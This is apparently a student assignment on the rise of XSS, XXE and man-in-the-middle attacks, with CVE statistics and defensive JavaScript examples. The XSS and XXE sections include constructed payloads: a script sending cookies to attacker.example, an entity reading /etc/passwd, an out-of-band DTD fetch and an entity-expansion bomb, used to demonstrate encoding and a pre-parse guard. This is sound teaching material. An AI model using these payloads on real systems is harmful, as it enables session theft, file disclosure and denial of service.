DA5. Web Attacks Impact
Statement
Year after year, several cyber attacks on web applications are on the rise. Conduct an online search to find the latest data (within 12 years of the current date) on XSS (XXE) and Man-in-the-Middle attacks, and:
- Review the data.
- Prepare your interpretation.
- Derive the conclusion of your interpretation. Support the case with external research references.
Solution
Introduction
Web application security is an ever-growing problem as societies become more and more web-dependent. As the chart below suggests, the number of published vulnerabilities has risen year after year and is now roughly six times what it was ten years ago (CveDetails, 2023, 1).
Total number of vulnerabilities 2013-2023 (CveDetails, 2023, 1)
XSS
XSS (Cross-Site Scripting) is a client-side injection attack: the attacker gets a malicious script into a web page so that other users' browsers execute it in the context of the vulnerable site (in stored XSS the payload is saved on the server and served to every visitor). The usual goal is to steal what the browser holds for that site (session cookies, tokens, form contents such as passwords) or to perform actions as the victim; when the script runs, the stolen data is sent to the attacker. The chart below shows the number of XSS vulnerabilities published in 2013-2023 (CveDetails, 2023, 1); the count is now roughly 7-8 times what it was ten years ago.
XSS vulnerabilities 2013-2023 (CveDetails, 2023, 1)
Here are a few examples of recent XSS vulnerabilities (Toulas, 2023, 3):
- Zimbra Web Client: discovered in July 2023 but still affecting some deployments, since not all users have updated. The root cause is missing input sanitization; the fix is here: https://github.com/Zimbra/zm-web-client/pull/827/commits/4d563480a73c806617b3da7b457ef65861ea2b9f
- XWiki Platform: discovered in August 2023 and rated critical; it is likewise due to missing URL sanitization; the fix is here: https://github.com/xwiki/xwiki-platform/commit/5e14c8d08fd0c5b619833d35090b470aa4cb52b0 (CveDetails, 2023, 2)
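Both fixes above come down to the same thing: untrusted text reached an HTML context without being encoded. The following is an added example (not code from the page, from Zimbra or from XWiki) showing a stored-XSS style comment renderer beside its output-encoded version. The function names, the attacker comment and the `attacker.example` host are all constructed for illustration.

```javascript
// Added example (not from the original page): a comment renderer that is
// vulnerable to stored XSS, beside the output-encoding fix. All names are
// illustrative; the attacker input is constructed.

// Constructed attacker input: a comment that exfiltrates the victim's cookies.
const ATTACKER_COMMENT =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Vulnerable: user-controlled text is concatenated straight into HTML.
// A browser rendering this output runs the script in the site's own origin.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// HTML-escape the five characters that can change meaning in an HTML body
// context (the OWASP output-encoding rule for this context).
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  })[ch]);
}

// Fixed: the same renderer with encoding applied at the point where the
// untrusted value enters HTML. The payload is displayed as inert text.
function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Crude check used by the demo: does the rendered HTML still carry a live
// <script> tag? (A real test would load it in a browser; this is enough to
// show the difference between the two renderers.)
function containsLiveScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

function demo() {
  const unsafe = renderCommentUnsafe(ATTACKER_COMMENT);
  const safe = renderCommentSafe(ATTACKER_COMMENT);
  return {
    unsafeExecutes: containsLiveScriptTag(unsafe), // true
    safeExecutes: containsLiveScriptTag(safe),     // false
    safeHtml: safe,
  };
}

console.log(demo());
```

Output encoding at the sink is the primary fix; marking session cookies `HttpOnly` additionally keeps `document.cookie` out of reach of any script that does get injected, which is exactly what the constructed payload above relies on.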
XXE
XXE (XML External Entity) is an attack that abuses an XML parser's entity processing: the document's DTD declares an external entity (pointing at a local file or an internal URL), and a parser that resolves it lets the attacker read sensitive files, make requests from the server (SSRF), exhaust memory and CPU through entity expansion (denial of service) and, in some parser configurations, execute code. The chart below shows the number of XXE vulnerabilities published in 2013-2023 (CveDetails, 2023, 1): the count rose year over year until 2018, dropped significantly through 2020, and is now increasing again at a slow pace.
XXE vulnerabilities 2013-2023 (CveDetails, 2023, 1)
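The real fix for XXE is to switch off DTD and external-entity processing in the parser (for example `disallow-doctype-decl` in Java's SAX/DOM parsers or `resolve_entities=False` in Python's lxml). As an added example (not code from the page), the guard below shows what such a configuration protects against: it inspects the DOCTYPE of an incoming document before any parsing and refuses the constructs XXE depends on. The three attack payloads and the benign document are constructed; the function name and the entity-count threshold are the author's choices.

```javascript
// Added example (not from the original page): a pre-parse guard that refuses
// XML documents carrying the DTD constructs XXE depends on. It is defence in
// depth for parsers whose configuration you do not control, not a substitute
// for disabling entity resolution in the parser. Payloads are constructed.

// Classic file-disclosure XXE: an external general entity is expanded into an
// element the application echoes back to the client.
const XXE_FILE_READ = `<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<order><item>&xxe;</item></order>`;

// Blind / out-of-band variant: a parameter entity fetches an attacker-hosted DTD.
const XXE_OOB = `<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY % remote SYSTEM "http://attacker.example/evil.dtd">
  %remote;
]>
<order/>`;

// Denial of service ("billion laughs"): no external entity at all, but nested
// internal entities expand exponentially when the parser resolves them.
const XML_BOMB = `<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>`;

// A benign document a typical order API would accept.
const BENIGN = `<?xml version="1.0"?><order><item>widget</item></order>`;

// Returns { ok: true } or { ok: false, reason } without parsing the XML.
// maxInternalEntities defaults to 0: most APIs never need a DTD at all.
function checkXmlForXxe(xml, { maxInternalEntities = 0 } = {}) {
  // Everything XXE needs lives inside the DOCTYPE declaration.
  const doctype = /<!DOCTYPE\b[^\[>]*(\[[\s\S]*?\])?\s*>/i.exec(xml);
  if (!doctype) return { ok: true };
  const subset = doctype[1] || '';
  // External general (xxe) or parameter (% remote) entities.
  if (/<!ENTITY\s+%?\s*[^\s>]+\s+(SYSTEM|PUBLIC)\b/i.test(subset)) {
    return { ok: false, reason: 'external entity declaration' };
  }
  // An external DTD referenced on the DOCTYPE line itself.
  if (/<!DOCTYPE\s+[^\s\[>]+\s+(SYSTEM|PUBLIC)\b/i.test(doctype[0])) {
    return { ok: false, reason: 'external DTD reference' };
  }
  // Internal entities are harmless alone but are the building block of
  // expansion bombs, so cap how many a document may declare.
  const internal = (subset.match(/<!ENTITY\s+[^%\s][^\s>]*\s+"/gi) || []).length;
  if (internal > maxInternalEntities) {
    return { ok: false, reason: `internal entities (${internal}) exceed limit` };
  }
  return { ok: true };
}

function demo() {
  return {
    fileRead: checkXmlForXxe(XXE_FILE_READ), // rejected: external entity
    oob: checkXmlForXxe(XXE_OOB),            // rejected: external entity
    bomb: checkXmlForXxe(XML_BOMB),          // rejected: 3 internal entities
    benign: checkXmlForXxe(BENIGN),          // ok
  };
}

console.log(demo());
```

The guard operates on the already-decoded string, so it must run after the request body has been decoded to text with the declared encoding; a regex backstop of this kind is easy to get subtly wrong, which is why the parser setting remains the control that actually matters.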
MITM
MITM (Man-in-the-Middle) is an attack in which the attacker secretly relays, reads and possibly alters the communication between two parties who believe they are talking to each other directly. Beyond the direct theft of credentials and session tokens from unencrypted traffic, its danger is that it feeds further exploitation: observing the connection tells the attacker which software and protocol versions are in use and whether other vulnerabilities are available, and altering it lets the attacker inject content or downgrade the connection to a weaker one.
Here are some figures on MITM attacks as reported by Astra Security Blog (2023, 4):
- MITM attacks account for 19% of all cyber-attacks.
- The costs of MITM attacks exceeded $2 billion in 2020.
- 50% of MITM attacks target banks and financial institutions.
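On the web, the defences that take the teeth out of a network attacker are TLS, HSTS (so the browser never makes the interceptable first `http://` request again) and cookies confined to HTTPS. The following is an added example (not code from the page or from Astra) that audits the response headers controlling those two things; the header sets, the one-year threshold and the function names are the author's constructions.

```javascript
// Added example (not from the original page): an audit of the HTTP response
// headers that decide whether a browser keeps a session on TLS. With HSTS
// enforced and session cookies marked Secure, an attacker who can intercept
// or downgrade traffic sees no session material. Header sets are constructed.

const ONE_YEAR = 31536000; // seconds; the commonly recommended HSTS minimum

// Parse "max-age=...; includeSubDomains; preload" into an object.
function parseHsts(value) {
  const out = { maxAge: null, includeSubDomains: false, preload: false };
  for (const raw of value.split(';')) {
    const directive = raw.trim();
    const m = /^max-age=(\d+)$/i.exec(directive);
    if (m) out.maxAge = Number(m[1]);
    else if (/^includeSubDomains$/i.test(directive)) out.includeSubDomains = true;
    else if (/^preload$/i.test(directive)) out.preload = true;
  }
  return out;
}

// headers: { name: value | [values] }, names matched case-insensitively.
// Returns an array of findings; an empty array means nothing to fix.
function auditTransportSecurity(headers) {
  const findings = [];
  const get = (name) => {
    const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
    return key === undefined ? undefined : headers[key];
  };

  const hsts = get('strict-transport-security');
  if (hsts === undefined) {
    findings.push('no Strict-Transport-Security: the first http:// request can be intercepted and is never upgraded');
  } else {
    const { maxAge, includeSubDomains } = parseHsts(String(hsts));
    if (maxAge === null) findings.push('HSTS header has no max-age');
    else if (maxAge < ONE_YEAR) findings.push(`HSTS max-age ${maxAge} is below one year`);
    if (!includeSubDomains) findings.push('HSTS does not cover subdomains; a parent-domain cookie can leak over http://sub');
  }

  // Set-Cookie may appear once (string) or several times (array).
  const cookies = [].concat(get('set-cookie') || []);
  for (const cookie of cookies) {
    const name = cookie.split('=')[0].trim();
    const attrs = cookie.split(';').slice(1).map((a) => a.trim().toLowerCase());
    if (!attrs.includes('secure')) findings.push(`cookie ${name} lacks Secure: sent in clear over http://`);
    if (!attrs.includes('httponly')) findings.push(`cookie ${name} lacks HttpOnly: readable by injected script (XSS)`);
  }
  return findings;
}

// Constructed responses: a weak deployment and its hardened counterpart.
const WEAK_HEADERS = {
  'Content-Type': 'text/html',
  'Set-Cookie': 'session=abc123; Path=/',
};

const HARDENED_HEADERS = {
  'Content-Type': 'text/html',
  'Strict-Transport-Security': 'max-age=63072000; includeSubDomains; preload',
  'Set-Cookie': ['session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax'],
};

console.log(auditTransportSecurity(WEAK_HEADERS));     // three findings
console.log(auditTransportSecurity(HARDENED_HEADERS)); // []
```

The same audit can be pointed at real responses by feeding it the header object a client library returns; note that HSTS only helps once the browser has seen it over a valid HTTPS connection, which is why the `preload` list exists.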
Conclusion
We saw how common web attacks are and how severe their consequences can be. It is important to educate end users and software professionals alike to keep their software up to date and to stay aware of the latest threats: delaying security patches leaves infrastructure exposed to exploitation, and thus to successful attacks.
References
1. CveDetails. (2023). Vulnerabilities by type. Cvedetails.com. https://www.cvedetails.com/vulnerabilities-by-types.php
2. CveDetails. (2023). XSS vulnerabilities published in 2023. Cvedetails.com. https://www.cvedetails.com/vulnerability-list/year-2023/opxss-1/xss.html
3. Toulas, B. (2023). Latest XSS news. BleepingComputer. https://www.bleepingcomputer.com/tag/xss/
4. Astra Security Blog. (2023). How Many Cyber Attacks Per Day: The Latest Stats and Impacts in 2023. Astra Security Blog. https://www.getastra.com/blog/security-audit/how-many-cyber-attacks-per-day/